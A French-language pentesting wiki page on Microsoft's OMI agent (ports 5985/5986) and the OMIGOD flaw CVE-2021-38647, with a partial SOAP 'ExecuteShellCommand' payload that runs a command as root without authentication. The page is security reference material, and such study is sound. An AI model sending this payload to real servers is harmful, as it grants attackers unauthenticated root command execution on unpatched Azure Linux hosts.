5985,5986 - Pentesting OMI

Informations de base

OMI est présenté comme un outil open-source par Microsoft, conçu pour la gestion de configuration à distance. Il est particulièrement pertinent pour les serveurs Linux sur Azure qui utilisent des services tels que :

• Azure Automation

• Mise à jour automatique Azure

• Suite de gestion des opérations Azure

• Analytique des journaux Azure

• Gestion de la configuration Azure

• Diagnostics Azure

Le processus omiengine est lancé et écoute sur toutes les interfaces en tant que root lorsque ces services sont activés.

Les ports par défaut utilisés sont 5985 (http) et 5986 (https).

Vulnérabilité CVE-2021-38647

Comme observé le 16 septembre, les serveurs Linux déployés dans Azure avec les services mentionnés sont vulnérables en raison d'une version vulnérable d'OMI. Cette vulnérabilité réside dans la gestion des messages du serveur OMI via le point de terminaison /wsman sans nécessiter d'en-tête d'authentification, autorisant incorrectement le client.

Un attaquant peut exploiter cela en envoyant une charge utile SOAP "ExecuteShellCommand" sans en-tête d'authentification, obligeant le serveur à exécuter des commandes avec des privilèges root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Pour plus d'informations sur cette CVE consultez ceci.

Références

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/